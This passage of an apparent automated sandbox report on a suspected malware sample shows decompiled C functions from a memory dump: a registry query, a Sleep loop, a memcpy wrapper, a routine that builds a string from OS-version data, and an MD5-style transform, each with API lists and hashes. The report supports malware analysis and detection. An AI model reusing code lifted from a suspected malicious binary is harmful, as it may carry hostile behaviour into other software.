                                                                                    • Part of subcall function 033F51C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43,80000002), ref: 033F5206
                                                                                    • Part of subcall function 033F51C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43), ref: 033F522B
                                                                                    • Part of subcall function 033F51C4: RegCloseKey.ADVAPI32(80000002,?,033FA449,3D033FC0,80000002,033F544E,00000000,033F544E,?,65696C43,80000002,00000000,?), ref: 033F525B
                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,033F4C83,?,004F0053,05F29328,00000000,?), ref: 033F41E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2109406458-0
                                                                                  • Opcode ID: 1e6ef7879a8e37aed221d0e03ced1efe1fc383d223c36ce38817ebb0252bc933
                                                                                  • Instruction ID: 7c17c9c4806b26f18721788fe8fad0186103b55468cf57403d78b3febb30c8fc
                                                                                  • Opcode Fuzzy Hash: 1e6ef7879a8e37aed221d0e03ced1efe1fc383d223c36ce38817ebb0252bc933
                                                                                  • Instruction Fuzzy Hash: 1501FB36140249EFCF12EF46CC85FAB3B69FB94360F948429FB154A151D631D521DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F13AD, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 88%
                                                                                  			E033F13AD(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                                                  0x033f13ad
                                                                                  0x033f13ba
                                                                                  0x033f13bb
                                                                                  0x033f13bc
                                                                                  0x033f13c3
                                                                                  0x033f13f1
                                                                                  0x033f13f2
                                                                                  0x033f13f5
                                                                                  0x033f13fb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x033f13da
                                                                                  0x033f13e4
                                                                                  0x033f13eb
                                                                                  0x00000000
                                                                                  0x033f13dc
                                                                                  0x033f13df
                                                                                  0x033f13ff
                                                                                  0x033f13e1
                                                                                  0x033f13e1
                                                                                  0x00000000
                                                                                  0x033f13e1
                                                                                  0x033f13df
                                                                                  0x033f1406
                                                                                  0x033f140c
                                                                                  0x033f140c
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 033F13F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 6769c51f30f680e01349a6c9094da1955c32dfb925b91c229bfa897903448a4d
                                                                                  • Instruction ID: 40acb8979b20941716908b32814cb26c7da163ac4d271fe79d63573a42550a83
                                                                                  • Opcode Fuzzy Hash: 6769c51f30f680e01349a6c9094da1955c32dfb925b91c229bfa897903448a4d
                                                                                  • Instruction Fuzzy Hash: 41F03771C01218EFCB04DBD9E888AEDB7B8FF04304F5480ABE602A3200D3B46B84CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F3FF3, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(033F544E,?,?,033FA536,3D033FC0,80000002,033F544E,033F5886,74666F53,4D4C4B48,033F5886,?,3D033FC0,80000002,033F544E,?), ref: 033F4013
                                                                                    • Part of subcall function 033F9F53: SysAllocString.OLEAUT32(033F5886), ref: 033F9F6D
                                                                                    • Part of subcall function 033F9F53: SysFreeString.OLEAUT32(00000000), ref: 033F9FAD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: String$AllocFreelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3808004451-0
                                                                                  • Opcode ID: 3d8f94fd22f4b606e251f65702cd95fb90b349fdd4c79bc7e7b72c32fe5b993d
                                                                                  • Instruction ID: 860662981974057f0139214e787e423829090c0dac72e105accdec0af6a3f60d
                                                                                  • Opcode Fuzzy Hash: 3d8f94fd22f4b606e251f65702cd95fb90b349fdd4c79bc7e7b72c32fe5b993d
                                                                                  • Instruction Fuzzy Hash: C0E0C23600020EFFDF129F80EC85EAA7F6AFB08350F448015FA1818061D772D6B0ABA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F74F4, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E033F74F4(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E033F7B54(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E033F4C31(_a4);
				}
				return _t13;
			}





                                                                                  0x033f7500
                                                                                  0x033f7505
                                                                                  0x033f7509
                                                                                  0x033f7510
                                                                                  0x033f751b
                                                                                  0x033f751f
                                                                                  0x033f751f
                                                                                  0x033f7528

                                                                                  APIs
                                                                                    • Part of subcall function 033F7B54: memcpy.NTDLL(00000000,00000090,033F38A2,033F38A2,?,?,033F38A2,?,?,033F819E,?), ref: 033F7B8A
                                                                                    • Part of subcall function 033F7B54: memset.NTDLL ref: 033F7BFF
                                                                                    • Part of subcall function 033F7B54: memset.NTDLL ref: 033F7C13
                                                                                  • memcpy.NTDLL(033F38A2,033F38A2,00000000,033F38A2,033F38A2,033F38A2,?,?,033F819E,?,?,033F38A2,?), ref: 033F7510
                                                                                    • Part of subcall function 033F4C31: RtlFreeHeap.NTDLL(00000000,00000000,033F5130,00000000,?,?,00000000,?,?,?,?,?,?,033F8792,00000000), ref: 033F4C3D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: memcpymemset$FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3053036209-0
                                                                                  • Opcode ID: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
                                                                                  • Instruction ID: e7a0aaa16c604be56900b3aae1077ec16ffe565f582bf03e8e24c73cf40e8d6d
                                                                                  • Opcode Fuzzy Hash: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
                                                                                  • Instruction Fuzzy Hash: 86E086368012187ECB12AA94DC80DFF7F5CCF466D0F444020FF084A200D631DA1093E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 033FA667, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 93%
                                                                                  			E033FA667() {
				signed char _t21;
				signed char _t23;
				intOrPtr _t29;
				signed int _t32;
				CHAR* _t35;
				void* _t37;
				void* _t39;

				_t37 = _t39 - 0x78;
				_t35 = 0;
				 *(_t37 - 0x24) = 0x9c;
				if(GetVersionExA(_t37 - 0x24) != 0) {
					_t35 = E033F75C4(0x42);
					if(_t35 != 0) {
						_t21 =  *0x33fd214; // 0x4000000a
						_t32 = _t21 & 0x000000ff;
						if( *(_t37 - 0x20) != _t32 ||  *(_t37 - 0x1c) != (_t21 & 0x000000ff)) {
							 *(_t37 + 0x70) =  *(_t37 + 0x70) & 0x00000000;
							 *(_t37 - 0x18) =  *(_t37 - 0x18) & 0x00000000;
							 *(_t37 - 0x20) = _t32;
							 *(_t37 - 0x1c) = _t21 & 0x000000ff;
						}
						_t23 =  *0x33fd218; // 0x1
						asm("sbb eax, eax");
						_t29 =  *0x33fd230; // 0x2b2a5a8
						_t16 = _t29 + 0x33fe8f1; // 0x252e7525
						wsprintfA(_t35, _t16,  *(_t37 - 0x20),  *(_t37 - 0x1c),  *(_t37 + 0x70) & 0x0000ffff,  *(_t37 - 0x18), ( ~(_t23 & 0x00000001) & 0xffffffea) + 0x56);
					}
				}
				return _t35;
			}










                                                                                  0x033fa668
                                                                                  0x033fa677
                                                                                  0x033fa679
                                                                                  0x033fa688
                                                                                  0x033fa691
                                                                                  0x033fa695
                                                                                  0x033fa697
                                                                                  0x033fa69c
                                                                                  0x033fa6a2
                                                                                  0x033fa6ac
                                                                                  0x033fa6b1
                                                                                  0x033fa6b8
                                                                                  0x033fa6bb
                                                                                  0x033fa6bb
                                                                                  0x033fa6be
                                                                                  0x033fa6c7
                                                                                  0x033fa6db
                                                                                  0x033fa6e3
                                                                                  0x033fa6eb
                                                                                  0x033fa6f1
                                                                                  0x033fa695
                                                                                  0x033fa6fb

                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(?,00000000), ref: 033FA680
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                  • wsprintfA.USER32 ref: 033FA6EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp Download File
                                                                                  Similarity
                                                                                  • API ID: AllocateHeapVersionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3641471311-0
                                                                                  • Opcode ID: 5c99ec5756c75d1fc18ce89b70e03d1d55efd60286b77bcba361a1285769d80c
                                                                                  • Instruction ID: ac28616a6a1d26de1c4496c5943582a1fafa2b9f72dcd4f3048371adeacd4dca
                                                                                  • Opcode Fuzzy Hash: 5c99ec5756c75d1fc18ce89b70e03d1d55efd60286b77bcba361a1285769d80c
                                                                                  • Instruction Fuzzy Hash: 441130B2D0022A9FDF10EFA4DC89ABDB7F8FB04305F444559F914E6145E339C5458BA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 033F28E9, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 50%
                                                                                  			E033F28E9(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                                                  0x033f28ec
                                                                                  0x033f28f7
                                                                                  0x033f28fa
                                                                                  0x033f28fd
                                                                                  0x033f28fe
                                                                                  0x033f28fe
                                                                                  0x033f2909
                                                                                  0x033f291a
                                                                                  0x033f291c
                                                                                  0x033f291f
                                                                                  0x033f291f
                                                                                  0x033f2922
                                                                                  0x033f2922
                                                                                  0x033f2925
                                                                                  0x033f2925
                                                                                  0x033f2928
                                                                                  0x033f2928
                                                                                  0x033f2945
                                                                                  0x033f2948
                                                                                  0x033f295e
                                                                                  0x033f2961
                                                                                  0x033f297b
                                                                                  0x033f297e
                                                                                  0x033f2994
                                                                                  0x033f2997
                                                                                  0x033f2999
                                                                                  0x033f29b1
                                                                                  0x033f29b4
                                                                                  0x033f29b7
                                                                                  0x033f29cf
                                                                                  0x033f29d2
                                                                                  0x033f29ec
                                                                                  0x033f29ef
                                                                                  0x033f2a05
                                                                                  0x033f2a08
                                                                                  0x033f2a0a
                                                                                  0x033f2a22
                                                                                  0x033f2a27
                                                                                  0x033f2a2a
                                                                                  0x033f2a40
                                                                                  0x033f2a43
                                                                                  0x033f2a5d
                                                                                  0x033f2a60
                                                                                  0x033f2a76
                                                                                  0x033f2a79
                                                                                  0x033f2a7b
                                                                                  0x033f2a96
                                                                                  0x033f2a99
                                                                                  0x033f2ab0
                                                                                  0x033f2ab3
                                                                                  0x033f2ab7
                                                                                  0x033f2ad0
                                                                                  0x033f2ad3
                                                                                  0x033f2ad5
                                                                                  0x033f2ad8
                                                                                  0x033f2af3
                                                                                  0x033f2af6
                                                                                  0x033f2b0f
                                                                                  0x033f2b12
                                                                                  0x033f2b22
                                                                                  0x033f2b25
                                                                                  0x033f2b3d
                                                                                  0x033f2b40
                                                                                  0x033f2b5a
                                                                                  0x033f2b5d
                                                                                  0x033f2b75
                                                                                  0x033f2b78
                                                                                  0x033f2b8e
                                                                                  0x033f2b91
                                                                                  0x033f2ba9
                                                                                  0x033f2bac
                                                                                  0x033f2bc4
                                                                                  0x033f2bc7
                                                                                  0x033f2be1
                                                                                  0x033f2be4
                                                                                  0x033f2bfa
                                                                                  0x033f2bfd
                                                                                  0x033f2c15
                                                                                  0x033f2c18
                                                                                  0x033f2c32
                                                                                  0x033f2c35
                                                                                  0x033f2c4d
                                                                                  0x033f2c50
                                                                                  0x033f2c66
                                                                                  0x033f2c69
                                                                                  0x033f2c81
                                                                                  0x033f2c84
                                                                                  0x033f2c9c
                                                                                  0x033f2c9f
                                                                                  0x033f2cb1
                                                                                  0x033f2cb4
                                                                                  0x033f2cc6
                                                                                  0x033f2cc9
                                                                                  0x033f2cdb
                                                                                  0x033f2cde
                                                                                  0x033f2ce2
                                                                                  0x033f2cf2
                                                                                  0x033f2cf5
                                                                                  0x033f2d03
                                                                                  0x033f2d06
                                                                                  0x033f2d18
                                                                                  0x033f2d1b
                                                                                  0x033f2d2f
                                                                                  0x033f2d32
                                                                                  0x033f2d34
                                                                                  0x033f2d44
                                                                                  0x033f2d47
                                                                                  0x033f2d59
                                                                                  0x033f2d5c
                                                                                  0x033f2d6a
                                                                                  0x033f2d6d
                                                                                  0x033f2d7f
                                                                                  0x033f2d82
                                                                                  0x033f2d86
                                                                                  0x033f2d96
                                                                                  0x033f2d99
                                                                                  0x033f2dab
                                                                                  0x033f2dae
                                                                                  0x033f2dbc
                                                                                  0x033f2dbf
                                                                                  0x033f2dd1
                                                                                  0x033f2dd4
                                                                                  0x033f2de6
                                                                                  0x033f2de9
                                                                                  0x033f2dfd
                                                                                  0x033f2e00
                                                                                  0x033f2e14
                                                                                  0x033f2e17
                                                                                  0x033f2e2b
                                                                                  0x033f2e2e
                                                                                  0x033f2e42
                                                                                  0x033f2e45
                                                                                  0x033f2e59
                                                                                  0x033f2e5c
                                                                                  0x033f2e70
                                                                                  0x033f2e75
                                                                                  0x033f2e87
                                                                                  0x033f2e8a
                                                                                  0x033f2e9e
                                                                                  0x033f2ea1
                                                                                  0x033f2eb5
                                                                                  0x033f2eb8
                                                                                  0x033f2ece
                                                                                  0x033f2ed1
                                                                                  0x033f2ee5
                                                                                  0x033f2ee8
                                                                                  0x033f2efa
                                                                                  0x033f2efd
                                                                                  0x033f2f11
                                                                                  0x033f2f14
                                                                                  0x033f2f28
                                                                                  0x033f2f2b
                                                                                  0x033f2f3f
                                                                                  0x033f2f48
                                                                                  0x033f2f4b
                                                                                  0x033f2f54
                                                                                  0x033f2f5d
                                                                                  0x033f2f65
                                                                                  0x033f2f6d
                                                                                  0x033f2f77
                                                                                  0x033f2f8c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp Download File
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp Download File
